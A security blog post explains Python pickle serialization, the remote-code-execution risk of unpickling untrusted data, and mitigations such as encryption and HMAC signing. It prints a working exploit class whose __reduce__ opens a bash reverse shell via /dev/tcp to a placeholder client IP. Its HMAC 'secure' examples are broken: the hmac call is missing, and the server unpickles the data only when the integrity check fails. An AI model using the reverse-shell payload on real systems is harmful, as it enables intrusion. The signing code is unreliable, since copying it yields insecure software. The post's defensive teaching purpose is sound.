Software Integrity


Understanding Python pickling and how to use it securely

Post written by Ashutosh Agrawal, Senior Consultant and Arvind Balaji, Associate Consultant

Pickle in python is primarily used in serializing and de-serializing a python object structure. In other words it’s the process of converting a python object into a byte stream in order to store it in a file/database, maintain program state across sessions, or to transport data over the network. The pickled byte stream can be used to re-create the original object hierarchy by un-pickling the stream. This whole process is similar to object serialization in Java or .Net.

When a byte stream is un-pickled, the pickle module creates an instance of the original object first and then populates the instance with the correct data. In order to achieve this, the byte stream contains only the data specific to the original object instance. But having just the data alone may not be sufficient. In order to successfully un-pickle the object, the pickled byte stream contains – instructions to the un-pickler to reconstruct the original object structure along with instruction operands, which help in populating the object structure.

According to the pickle module documentation, the following types can be pickled:

  • None, true, and false
  • Integers, long integers, floating point numbers, complex numbers
  • Normal and Unicode strings
  • Tuples, lists, sets, and dictionaries containing only picklable objects
  • Functions defined at the top level of a module
  • Built-in functions defined at the top level of a module
  • Classes that are defined at the top level of a module

Pickle allows different objects to declare how they should be pickled using the __reduce__ method. Whenever an object is pickled, the __reduce__ method defined by it, gets called. This method returns either a string, which may represent the name of a python global, or a tuple describing how to reconstruct this object when un-pickling.

Generally the tuple consists of 2 arguments:

  • A callable (which in most cases would be the name of the class to call).
  • Arguments to be passed to the above callable.

The pickle library will pickle each component of the tuple separately, and will call the callable on the provided arguments to construct the new object during the process of un-pickling.

Dangers in Pickle

Since there are no effective ways to verify the pickle stream being un-pickled, it is possible to provide malicious shell code as input, causing remote code execution. The most common attack scenario leading to this would be to trust raw pickle data received over the network. If the connection is unencrypted, the pickle received could have also been modified on the wire. Another attack scenario is when an attacker can access and modify the stored pickle files from caches, file systems or databases.

The following example code demonstrates a simple client server program. The server connects to a particular port and waits for client to send data. Once it receives the data, it un-pickles it.

conn,addr = self.receiver_socket.accept()
data = conn.recv(1024)
return cPickle.loads(data)

If the client is not trusted, an attacker can get remote code to execute on the server and gain access to it.

class Shell_code(object):
  def __reduce__(self):
          return (os.system,('/bin/bash -i >& /dev/tcp/"Client IP"/"Listening PORT" 0>&1',))
shell = cPickle.dumps(Shell_code())
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('Server IP','Server PORT'))

Best Practices in Pickle

The pickle module is not inherently insecure. The following best practices allow safe implementation of pickle.

  • An untrusted client or an untrusted server can cause remote code execution. Thus pickle should never be used between unknown parties.
  • Ensure the parties exchanging pickle have an encrypted network connection. This prevents alteration or replay of data on the wire.
  • If having a secure connection is not possible, any alteration in pickle can be verified by using a cryptographic signature. Pickle can be signed before storage or transmission and its signature can be verified before loading it on the receiver side.
  • In scenarios where the pickle data is stored, review file system permissions and ensure protected access to the data.

The following example code demonstrates cryptographic signature and verification. The cryptographic signature, as mentioned above, helps in detecting any alteration of pickled data. The client uses HMAC to sign the data. It sends the digest value along with the pickled data to the server as shown below.

pickled_data = pickle.dumps(data)
digest ='shared-key', pickled_data, hashlib.sha1).hexdigest()
header = '%s' % (digest)
conn.send(header + ' ' + pickled_data)

The server receives the data, computes the digest and verifies it with the one that was sent.

conn,addr = self.receiver_socket.accept()
data = conn.recv(1024)
recvd_digest, pickled_data = data.split(' ')
new_digest ='shared-key', pickled_data, hashlib.sha1).hexdigest()
if recvd_digest != new_digest:
    print 'Integrity check failed'
    unpickled_data = pickle.loads(pickled_data)